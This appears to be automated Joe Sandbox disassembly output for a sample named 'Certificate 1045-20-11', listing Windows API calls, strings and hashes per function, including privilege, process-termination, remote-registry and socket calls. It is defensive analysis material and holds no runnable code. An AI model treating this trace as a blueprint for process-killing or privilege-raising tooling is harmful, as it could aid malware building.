                                                                                • Opcode Fuzzy Hash: c8514bce4ed829e28d61defc204832adf91525ce078c8563f5a588666398dc6e
                                                                                • Instruction Fuzzy Hash: CFD19E316043009FDB24EF28C491A6ABBE5FF85314F18856DF999DB6A2DB30ED44CB52
                                                                                APIs
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 008AB3F4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: InvalidateRect
                                                                                • String ID:
                                                                                • API String ID: 634782764-0
                                                                                • Opcode ID: df50c9a71a60856bfc6930079e8f50f2e011e89e9d63c2d78a0b3ee808862241
                                                                                • Instruction ID: 87e86c0abc22ccba6747733bf45d52453de9faa02c75b4f64302722b7696d2bd
                                                                                • Opcode Fuzzy Hash: df50c9a71a60856bfc6930079e8f50f2e011e89e9d63c2d78a0b3ee808862241
                                                                                • Instruction Fuzzy Hash: 75517D30A01208BFFF209F688C85FA97BA4FB06328F644125FA55D6AE3D771E950DA51
                                                                                APIs
                                                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 008BDB1B
                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 008BDB3C
                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008BDB51
                                                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 008BDB6E
                                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008BDB95
                                                                                • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0085A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 008BDBA0
                                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 008BDBBD
                                                                                • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0085A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 008BDBC8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                • String ID:
                                                                                • API String ID: 1268354404-0
                                                                                • Opcode ID: 73b92272535b02afb87ba2ef56f4902c6737bfce6f28a0c71381f479fb943bf8
                                                                                • Instruction ID: 1f77523c7894a88d4d6e2a5a49f9da30e4b293a80f04ad3a6d0a2f7f9e662aa8
                                                                                • Opcode Fuzzy Hash: 73b92272535b02afb87ba2ef56f4902c6737bfce6f28a0c71381f479fb943bf8
                                                                                • Instruction Fuzzy Hash: 47515670600309AFDB24DF28CC81FAA77F8FB18765F100629F946D6290E7B0A984DB51
                                                                                APIs
                                                                                  • Part of subcall function 00886EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00885FA6,?), ref: 00886ED8
                                                                                  • Part of subcall function 00886EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00885FA6,?), ref: 00886EF1
                                                                                  • Part of subcall function 008872CB: GetFileAttributesW.KERNEL32(?,00886019), ref: 008872CC
                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 008875CA
                                                                                • _wcscmp.LIBCMT ref: 008875E2
                                                                                • MoveFileW.KERNEL32(?,?), ref: 008875FB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 793581249-0
                                                                                • Opcode ID: 4f56b2f47d47f4b5ea2f28df802d3e6cd33749e06980626ade69f07ac71663c6
                                                                                • Instruction ID: f313fd494c06c1bd0385f183519d5c97c64a476caf5c02a80887ef9137e50537
                                                                                • Opcode Fuzzy Hash: 4f56b2f47d47f4b5ea2f28df802d3e6cd33749e06980626ade69f07ac71663c6
                                                                                • Instruction Fuzzy Hash: 09510EB2A092199ADF60FB94D845DDE73BCFF08310B1041AAF609E3141EA74D6C5CF65
                                                                                APIs
                                                                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,008BDAD1,00000004,00000000,00000000), ref: 0085EAEB
                                                                                • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,008BDAD1,00000004,00000000,00000000), ref: 0085EB32
                                                                                • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,008BDAD1,00000004,00000000,00000000), ref: 008BDC86
                                                                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,008BDAD1,00000004,00000000,00000000), ref: 008BDCF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ShowWindow
                                                                                • String ID:
                                                                                • API String ID: 1268545403-0
                                                                                • Opcode ID: 0aa936b84cef65992f9c623f2bcb92b07b52cdc051392b3f354628c95ce075bb
                                                                                • Instruction ID: 6deff1cd351789b42d1b5bd0f4b144ff2b12c3158f72c283a25c76bd9452babe
                                                                                • Opcode Fuzzy Hash: 0aa936b84cef65992f9c623f2bcb92b07b52cdc051392b3f354628c95ce075bb
                                                                                • Instruction Fuzzy Hash: D1412830208380EAD73D5B38CD9DE6A7E96FB5132BF19041DE887E2761D671BA48D312
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0087AEF1,00000B00,?,?), ref: 0087B26C
                                                                                • HeapAlloc.KERNEL32(00000000,?,0087AEF1,00000B00,?,?), ref: 0087B273
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0087AEF1,00000B00,?,?), ref: 0087B288
                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,0087AEF1,00000B00,?,?), ref: 0087B290
                                                                                • DuplicateHandle.KERNEL32(00000000,?,0087AEF1,00000B00,?,?), ref: 0087B293
                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0087AEF1,00000B00,?,?), ref: 0087B2A3
                                                                                • GetCurrentProcess.KERNEL32(0087AEF1,00000000,?,0087AEF1,00000B00,?,?), ref: 0087B2AB
                                                                                • DuplicateHandle.KERNEL32(00000000,?,0087AEF1,00000B00,?,?), ref: 0087B2AE
                                                                                • CreateThread.KERNEL32(00000000,00000000,0087B2D4,00000000,00000000,00000000), ref: 0087B2C8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                • String ID:
                                                                                • API String ID: 1957940570-0
                                                                                • Opcode ID: b45a1ebe307d61cd7f83f77c501c15e361ddaf7f0d40caf02e603dd803f92fe5
                                                                                • Instruction ID: 9be52095b808a3442e01cfac689950de42959c259f6679258660461a4eb3cf4e
                                                                                • Opcode Fuzzy Hash: b45a1ebe307d61cd7f83f77c501c15e361ddaf7f0d40caf02e603dd803f92fe5
                                                                                • Instruction Fuzzy Hash: F201BBB6240344BFE710BBB5DC49F6B7BACFB88711F018425FA05DB2A1DA749801CB61
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                • API String ID: 0-572801152
                                                                                • Opcode ID: 572366e0a38bf7a50f5baafb81030dd872e77b96b72298c8c5a280a6015fc121
                                                                                • Instruction ID: 954b6669046a420f4be425a019794f466f7c565d9148d0a58868cd1226caede6
                                                                                • Opcode Fuzzy Hash: 572366e0a38bf7a50f5baafb81030dd872e77b96b72298c8c5a280a6015fc121
                                                                                • Instruction Fuzzy Hash: 1CE1A171A0021AAFDF14EFA8C881AAE77B5FF48354F188029F945EB281D771ED45CB91
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$_memset
                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                • API String ID: 2862541840-625585964
                                                                                • Opcode ID: 79d30211f0546d56b55ff694828149cf47d6beaef825e1c554274da7a0b728b8
                                                                                • Instruction ID: 1e9b6074fdf029c29e6cd946d0200f1b4a642a0f1532e973033cd238b66b6094
                                                                                • Opcode Fuzzy Hash: 79d30211f0546d56b55ff694828149cf47d6beaef825e1c554274da7a0b728b8
                                                                                • Instruction Fuzzy Hash: 1E919C71A00219AFDF24EFA4E944FAEBBB8FF85714F148159F515EB280DB709944CBA0
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 008A9B19
                                                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 008A9B2D
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 008A9B47
                                                                                • _wcscat.LIBCMT ref: 008A9BA2
                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 008A9BB9
                                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 008A9BE7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window_wcscat
                                                                                • String ID: SysListView32
                                                                                • API String ID: 307300125-78025650
                                                                                • Opcode ID: c6fc8f0c957f898a936841221fbec76a5a60cd47d2d3e0b0981fb055234716b9
                                                                                • Instruction ID: 8624bd186a820bf6f7d230a440a488fae231cf838af3736a282b467ae1d75430
                                                                                • Opcode Fuzzy Hash: c6fc8f0c957f898a936841221fbec76a5a60cd47d2d3e0b0981fb055234716b9
                                                                                • Instruction Fuzzy Hash: 4F41CE70904318AFEB219FA8CC85FEA77B8FF09350F10042AF689E7291D6759D85CB60
                                                                                APIs
                                                                                  • Part of subcall function 00886532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00886554
                                                                                  • Part of subcall function 00886532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00886564
                                                                                  • Part of subcall function 00886532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 008865F9
                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008A179A
                                                                                • GetLastError.KERNEL32 ref: 008A17AD
                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008A17D9
                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 008A1855
                                                                                • GetLastError.KERNEL32(00000000), ref: 008A1860
                                                                                • CloseHandle.KERNEL32(00000000), ref: 008A1895
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                • String ID: SeDebugPrivilege
                                                                                • API String ID: 2533919879-2896544425
                                                                                • Opcode ID: d0dd79247a10a0380e786fd045d71b9f79925609af3acc690894ac30a8f30c00
                                                                                • Instruction ID: cb7b56263ecca6136bbad19b4ac0fe68e067329e9a7fec1a1ab3c02bdb2b593f
                                                                                • Opcode Fuzzy Hash: d0dd79247a10a0380e786fd045d71b9f79925609af3acc690894ac30a8f30c00
                                                                                • Instruction Fuzzy Hash: 4F417D71600205AFEF05EF58C899F6DB7A5FF55710F088069F906DB392DBB8A9048B92
                                                                                APIs
                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 008858B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: IconLoad
                                                                                • String ID: blank$info$question$stop$warning
                                                                                • API String ID: 2457776203-404129466
                                                                                • Opcode ID: 96dd1e8c9ed270e9b9a92225faa10e55c2b4ebc108c0c36ee9f9abfbb14c48b5
                                                                                • Instruction ID: 9371294714de529b30c8a58f6658c10f9cb2b7eb962646a21782c5a95949c0cf
                                                                                • Opcode Fuzzy Hash: 96dd1e8c9ed270e9b9a92225faa10e55c2b4ebc108c0c36ee9f9abfbb14c48b5
                                                                                • Instruction Fuzzy Hash: 9511DD3560D74AFAE7157B649C82D6B779CFF25314B20003BF611E63C2E774AA005769
                                                                                APIs
                                                                                • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0088A806
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ArraySafeVartype
                                                                                • String ID:
                                                                                • API String ID: 1725837607-0
                                                                                • Opcode ID: 2878af42251c33a5fb030ae3c367e69860d045343eec797ed1c741cebf3d3967
                                                                                • Instruction ID: 746729a9d79d1d07c6fe140690415e25223eb4f289f36ba790fe75d12039b3b6
                                                                                • Opcode Fuzzy Hash: 2878af42251c33a5fb030ae3c367e69860d045343eec797ed1c741cebf3d3967
                                                                                • Instruction Fuzzy Hash: 3EC1917590421ADFEB08EF98C481BAEB7F4FF08315F24406AE655E7281D734A942CB96
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00886B63
                                                                                • LoadStringW.USER32(00000000), ref: 00886B6A
                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00886B80
                                                                                • LoadStringW.USER32(00000000), ref: 00886B87
                                                                                • _wprintf.LIBCMT ref: 00886BAD
                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00886BCB
                                                                                Strings
                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 00886BA8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                • API String ID: 3648134473-3128320259
                                                                                • Opcode ID: d54b404a3cb1f610aba5de139e5e1bcb3b8fefbedddeef15538aee780550e465
                                                                                • Instruction ID: d55fe11963338baad43e58b7ad5a9e7ad09721df38d139888324b3a82cf71226
                                                                                • Opcode Fuzzy Hash: d54b404a3cb1f610aba5de139e5e1bcb3b8fefbedddeef15538aee780550e465
                                                                                • Instruction Fuzzy Hash: 7C011DF6900308BFEB11BBA49D89EF6777CFB08304F0444A6B746E2141EA749E858B71
                                                                                APIs
                                                                                  • Part of subcall function 008A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008A2BB5,?,?), ref: 008A3C1D
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008A2BF6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharConnectRegistryUpper
                                                                                • String ID:
                                                                                • API String ID: 2595220575-0
                                                                                • Opcode ID: 175e9bdda5c9861edb3e4ca1bb72cfe8732283714872b85263211cbbf7692621
                                                                                • Instruction ID: 06afa38838155e97ccc05357515a63b97998082d26976ff989bfe15a83e2552e
                                                                                • Opcode Fuzzy Hash: 175e9bdda5c9861edb3e4ca1bb72cfe8732283714872b85263211cbbf7692621
                                                                                • Instruction Fuzzy Hash: 089145712042099FDB20EF58C891B6EB7E5FF89314F04881DF996DB2A2DB74E945CB42
                                                                                APIs
                                                                                • select.WSOCK32 ref: 00899691
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0089969E
                                                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 008996C8
                                                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 008996E9
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 008996F8
                                                                                • inet_ntoa.WSOCK32(?), ref: 00899765
                                                                                • htons.WSOCK32(?,?,?,00000000,?), ref: 008997AA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$htonsinet_ntoaselect
                                                                                • String ID:
                                                                                • API String ID: 500251541-0
                                                                                • Opcode ID: 08f8cb672c080efd08e07bba0ba277fd0bd88ee122edfcc239fb82d4ae7d3af7
                                                                                • Instruction ID: c5219673933c1878ef509a36ff875ff08bb9f7f919a307a63125c7bc0cd7a48e
                                                                                • Opcode Fuzzy Hash: 08f8cb672c080efd08e07bba0ba277fd0bd88ee122edfcc239fb82d4ae7d3af7
                                                                                • Instruction Fuzzy Hash: 9F71BC31504204ABCB14EF68CC85E6BB7A8FF85714F144A2DF596E72A1EB30E905CB62
                                                                                APIs
                                                                                • __mtinitlocknum.LIBCMT ref: 0086A991
                                                                                  • Part of subcall function 00867D7C: __FF_MSGBANNER.LIBCMT ref: 00867D91
                                                                                  • Part of subcall function 00867D7C: __NMSG_WRITE.LIBCMT ref: 00867D98
                                                                                  • Part of subcall function 00867D7C: __malloc_crt.LIBCMT ref: 00867DB8
                                                                                • __lock.LIBCMT ref: 0086A9A4
                                                                                • __lock.LIBCMT ref: 0086A9F0
                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,008F6DE0,00000018,00875E7B,?,00000000,00000109), ref: 0086AA0C
                                                                                • EnterCriticalSection.KERNEL32(8000000C,008F6DE0,00000018,00875E7B,?,00000000,00000109), ref: 0086AA29
                                                                                • LeaveCriticalSection.KERNEL32(8000000C), ref: 0086AA39
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                • String ID:
                                                                                • API String ID: 1422805418-0
                                                                                • Opcode ID: b1bb50f995443c422e44e1a08bc61b619c204831ec6ee8329ca6932fbdcc6e91
                                                                                • Instruction ID: aca57c491ef71ff5de34dc98c49490a431d6baa200f96068ecdd00145da8b563
                                                                                • Opcode Fuzzy Hash: b1bb50f995443c422e44e1a08bc61b619c204831ec6ee8329ca6932fbdcc6e91
                                                                                • Instruction Fuzzy Hash: 7E4106719002259FEB189FACDA44758BBB0FF41336F22822AE525FB2D1D7749940CF92
                                                                                APIs
                                                                                • DeleteObject.GDI32(00000000), ref: 008A8EE4
                                                                                • GetDC.USER32(00000000), ref: 008A8EEC
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008A8EF7
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 008A8F03
                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 008A8F3F
                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 008A8F50
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,008ABD19,?,?,000000FF,00000000,?,000000FF,?), ref: 008A8F8A
                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 008A8FAA
                                                                                Memory Dump Source
